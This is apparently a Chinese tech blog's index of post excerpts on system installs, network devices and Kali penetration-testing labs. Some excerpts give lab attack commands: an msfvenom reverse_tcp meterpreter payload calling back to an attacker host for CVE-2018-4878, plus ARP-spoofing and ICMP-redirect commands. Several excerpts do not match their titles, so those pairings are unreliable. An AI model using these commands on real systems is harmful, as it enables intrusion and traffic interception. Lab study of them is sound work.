qq_42039946的博客

原创 Rocky linux8.3系统安装

在2022年公布的中职网络搭建与应用赛项赛程中，Rocky linux作为其linux服务部分的比赛系统，本文以Rocky linux 8.3为例进行安装。

原创 UOS服务器版V20 1040d版本系统安装

统信UOS服务器版V20 1040d版本系统安装

原创 Uniontechos-server-20 1050e统信UOS服务器版V20安装

统信服务器版操作系统V20安装uniontechos-server-20-1050e-amd64.iso

原创 CTFhub【彩蛋】部分技能树解题

一、背景最近玩CTF，自己在win7下用phpstudy搭建了个DVWA+webug4.0+sqli-labs+upload-labs+pikachu的5合1靶场，但是发现phpstudy设置开机自启后只能是win7系统用户登录后才会运行，系统用户注销后phpstudy程序会自动关闭，每次开靶场都要登录一下，有点麻烦，所以就想实现win7开机后直接自动启动phpstudy，让phpstudy不再依赖系统用户来运行。二、准备工作 1.准备好两个应用程序instsrv....

原创 Virtualbox拓展包下载与安装

天下苦百度网盘限速久矣，阿里网盘不限速就是最大的优势，起码短期内要打市场应该不会限速。因为之前有用RaiDrive挂载群晖NAS，所以也就想把阿里网盘也做成本地磁盘，这样就方便些。1. 获取token浏览器登录网页版阿里网盘之后按F12，依次点击Application、Local Storage，网站URL，将token字段中的【refresh_token】字段记录出来将你的refresh_token写入run.bat文件中双击运行bat文件后启动RaiDriver.

原创 针对win10电脑无线网卡的优化方法

无线网卡优化win10系统内依次打开【设置/控制面板】-【网络和internet】-【更改适配器设置】右键需要修改的无线网卡，依次点击【属性】-【配置】在高级选项栏中修改以下参数【multichannel concurrent】修改为enable+Hostport，部分电脑的网卡只有disabled和enable的话修改为enable。此选项可以解决无线网卡与蓝牙网络冲突的问题。【Preferred enable】修改为5G first，现在大部分路由器都是2.4G和5G双频..

原创 win10使用wireshark解析https加密流量

本案例中使用win10专业版，wireshark版本为3.4.7wireshark下载链接为https://2.na.dl.wireshark.org/win64/Wireshark-win64-3.4.7.exe1.配置windows环境变量，导出浏览器SSL/TLS密钥点击键盘上【开始】键（也就是win键）输入【环境变量】，点击【编辑环境变量】点击【环境变量】-系统变量部分点击【新建】配置变量名为【SSLKEYLOGFILE】，变量值可以自定义一个路径，文件名和目录不含

原创 谷歌身份验证器无法弹出问题解决

准备一个火狐浏览器选择【拓展和主题】后安装好Redirector插件编辑参数如下 Redirect:https://www.google.com/recaptcha/api.jsto:https://www.recaptcha.net/recaptcha/api.jsExample:https://www.google.com/recaptcha/api.js → https://www.recaptcha.net/recaptcha/api.jsApplies to:M

原创 Kali2021-2配置Maltego4.2.17

Wafw00f web防火墙指纹识别工具1.github下载Wafw00f工具https://github.com/EnableSecurity/wafw00f.git2.切换到Wafw00f下载目录后解压下载出的压缩文件unzip wafw00f-master.zip3. 切换到解压出的目录后使用python安装sudo python setup.py install 4.此时运行wafw00f会发现缺少了pip依赖包5. 安装pipsud.

原创 KALI2021-2安装Masscan扫描器

1.下载搜狗输入法linux版本deb包https://pinyin.sogou.com/linux/?r=pinyin2. 安装输入法管理器,依次执行以下命令sudo apt install fcitxapt --fix-broken installsudo apt install fcitx

原创 Kali2021-2安装aquatone子域名收集工具

因为kali官网下载的2021-2版本虚拟机内移除了aquatone工具，所以需要自己安装1.安装gem和rubysudo apt install gem -ysudo apt install ruby -y2. 切换到alternatives目录下，kali系统2021-2版本直接cd即可cd /etc/alternatives3. 通过gem安装aquatone工具sudo gem install aquatone4.通过帮助参数验证安装成功...

原创 通过物理机web管理华为ensp模拟器防火墙

华为ensp模拟器防火墙配置（以USG6000V为例）注意模拟器中cloud设备和和防火墙之间需要添加一台空配置的交换机，否则有可能会导致物理机中学习不到交换机接口的mac地址，导致无法访问！！！！！！！！！一、通过ensp中的cloud设备实现模拟器环境与物理机网络互通 1.1鼠标右键cloud设备，点击【设置】 1.2 绑定信息选择【UDP】，端口类型选择【GE】，然后点击【增加】1.3 增加成功后如下图所示1.4 绑定信息选择网卡，选择网卡时需要留...

原创 渗透中Mysql常用命令

渗透中常用命令查看数据库版本select @@version；切换数据库到information_schemause information_schema;查看有哪些数据库show tables； 注意SCHEMATA表，这张表里有mysql所有的数据库名称查看指定数据库有哪些表select table_name form information_schema.tables where table_schema="demotest"；看指定数据库的指定表字段sele

原创 Sqli-lab注入靶场安装部署

一、准备工作1.1准备一台windows虚拟机，windows server或者windows系统均可，本文中使用win10系统1.2.准备sqli-lab源文件，可以通过https://download.csdn.net/download/qq_42039946/20359906下载 或者通过gibhub下载https://github.com/workcha/sqli-labs-master1.3准备phpstudy，下载链接为：https://public.xp.cn/upg...

原创 Centos7.2使用离线源配置ISCSI服务器

1

原创 debian10.7-DLBD版本安装

选中图形化安装语言选择英语选择时区键盘类型：美式英语配置主机名称配置域名(FQDN)配置root密码为Chinaskill20!创建用户demodemo用户登录账号demo用户密码等待自动配置配置时区磁盘分区等待自动安装拒绝软件包使用调查选择安装的软件包等待安装安装gruboot完成安装...

原创 VMwareWorkstation16安装部署WindowsServer2019

一、准备环节VMwareWorkstation软件 本次使用版本为VMwareWorkstation16 Pro 16.1.0 build-17198959WindowsServer2019镜像 本次使用MSDN下载的cn_windows_server_2019_x64_dvd_4de40f33.iso二、配置虚拟机参数1、点击VMwareWorkstation软件左上角【文件】-【新建虚拟机】2、选择【自定义】安装虚拟机3、选择虚拟机兼容性，这一步保持默...

原创 华为AR1200路由器清空console密码

插上console线后重启开机会依次看到一下内容信息，需要操作的部分我会单独使用“//”注释*************************************************************** HUAWEI AR. ******BOOT version:312 (Build time: May 10 2016 - 15:58:51) ***************************...

原创 VMwareESXI7.0安装部署

一、前言1.准备VMwareESXI7.0安装镜像2.本次安装使用VMware Workstation16pro版本虚拟化安装3.本次主要介绍ESXI7.0的安装部署过程，所以虚拟机资源不会分配很多，有机会再使用物理服务器进行安装4.本节使用镜像版本为VMware-VMvisor-Installer-7.0b-16324942.x86_64.iso，下图为资源分配情况二、开始安装1.开始安装，点击回车开始引导等待安装文件加载点击回车开始安装F11同意使

原创 使用kali进行局域网icmp重定向攻击

1.环境准备攻击机：kali虚拟机 IP地址192.168.126.130 网关192.168.126.2 安装好netwox工具靶机：win7虚拟机 IP地址192.168.126.131 网关192.168.126.2目的：通过KALI给win7发送ICMP重定向报文使win7认为原192.168.126.2的网关失效，数据包通过192.168.126.130来转发2.流程操作攻击前win7可以正常访问公网在kali上执行攻击命令sudo netwox 86 -..

原创 使用kali进行局域网ARP欺骗攻击与监听

一、环境准备物理机：win10电脑一台VMware Workstation Pro虚拟化软件Kali_linux虚拟机一台kali虚拟机网卡配置为桥接模式并桥接到物理机网卡。使用如下命令安装dsniff工具apt-get install dsniff二、ARP欺骗攻击1.通过arp -a检查攻击前的主机arp表，网关mac地址为77-a6-292.在kali端使用arpspoof命令进行arp欺骗sudo arpspoof -i eth0 -t 192.168.

原创 MSF可用的shell口令

show exploits列出metasploit框架中的所有渗透攻击模块。show payloads列出metasploit框架中的所有攻击载荷。show auxiliary列出metasploit框架中的所有辅助攻击载荷。search name查找metasploit框架中所有的渗透攻击和其他模块。info展示出制定渗透攻击或模块的相关信息。use name装载一个渗透攻击或模块。LHOST本地可以让目标主机连接的IP地址，通常当目标主机不在同一个局域网内时，就需要是一个公共.

转载 渗透测试问题整合

一、思路流程1、信息收集a、服务器的相关信息（真实ip，系统类型，版本，开放端口，WAF等）b、网站指纹识别（包括，cms，cdn，证书等），dns记录c、whois信息，姓名，备案，邮箱，电话反查（邮箱丢社工库，社工准备等）e、子域名收集，旁站，C段等f、google hacking针对化搜索，pdf文件，中间件版本，弱口令扫描等g、扫描网站目录结构，爆后台，网站banner，测试文件，备份等敏感文件泄漏等h、传输协议，通用漏洞，exp，github源码等2、漏洞挖掘

原创 CVE-2018-4878 漏洞复现

1.生成shellcodemsfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.8.130 lport=8888 -f python>shellcode.txtlhost的修改为自己kali平台的IP，端口号也可以自行修改2.查看shellcoderoot@kali:~# cat shellcode.txt3.编辑CVE-2018-4878-master.py文件3.1 替换shellcode3.2修改swf..

原创 工作遇到的小问题与解决

1.H3C交换机 ||||深信服防火墙 ||||华为交换机如上拓扑的话深信服防护墙配置vlan必须写具体vlan，不能写范围2.深信服设备大版本升级需要提前查阅升级路线图3.华为交换机对接H3C交换机时可能不通，有时候H3C交换机需要把聚合口的配置再在物理接口上配置一遍4.不同厂商网络设备聚合做对接可以的话最好LACP5.深...

原创 深信服EDR产品线实施遇到的问题

1.安装edr agent的服务器剩余内存要不少于500M，linux释放服务器空闲内存，执行echo 3 > /proc/sys/vm/drop_caches，建议在业务空闲情况下操作2.linux下需要root权限安装，centos要求防火墙版本为0.4.x以上3.在Centos服务器上安装edr agent 在执行安装脚本的报错出现报错，提升“Unable to find cr...

原创 linux小常识

linux文件系统：由文件和固定功能的目录组成init3 纯dosinit5 回GUIctrl f1-5 工作空间切换命令行复制粘贴可 ctrl+shift+c +v双击TAB 效果等同于数通设备的？alt + . 可以调用上一条命令的最后一个参数 （esc . 也可以）密码恢复重启开机按E，把linux那一行删除到ro，并在后面追加上rd.breakmo...

原创 BGP状态机

原创 华为交换机清console密码

Press Ctrl+B or Ctrl+E to enter BootLoad menu: 2Password:The password is wrongPassword:The password is wrongPassword:The default password is used now. Change the password. Bo...

原创 深信服超融合数据通讯口地址冲突报错处理

一.现象，一键检测后出现告警二.处理过程1.检查数据通信口（Vxlan）配置2.确认配置无误后，检查实体机数据通信口是否获取到IP池中的IP地址...

原创 数通的小东西

OSPF(IP) 89     DR发送路由更新224.0.0.5 非DR/BDR发送LSA更新224.0.0.6   内部10外部150RIP(UDP) port520   更新30S，老化180S，回收120S              组播224.0.0.9             优先级100RIPng    port521   IPV6的RIPBGP(TCP) port179   ...

原创 计算节点安装neutron组件时验证sysctl值的时候报错

计算节点安装neutron组件时验证sysctl值的时候有一个报错sysctl net.bridge.bridge-nf-call-ip6tablessysctl net.bridge.bridge-nf-call-iptables   报错sysctl: cannot stat /proc/sys/net/bridge/bridge-nf-call-iptables: No such...

原创 JumpServer开源堡垒机安装过程详解

安装过程参考Jumpserver官方文档：http://docs.jumpserver.org/zh/docs/step_by_step.html一 .系统相关VMware虚拟机：2G内存，双核处理器，20G硬盘，桥接模式，系统使用centos7.2，最小化安装IP地址：172.16.0.38/241.设置SElinux和防火墙，字符编码firewall-cmd --zone...

原创 openstack Q版的部署安装，双节点

就当云笔记用了部署过程参考openstack官方文档https://docs.openstack.org/install-guide/openstack-services.html#minimal-deployment-for-queens也参考了https://blog.csdn.net/LL_JCB/article/details/80146328，扶艾大佬这个系列的文章，没有用本地源...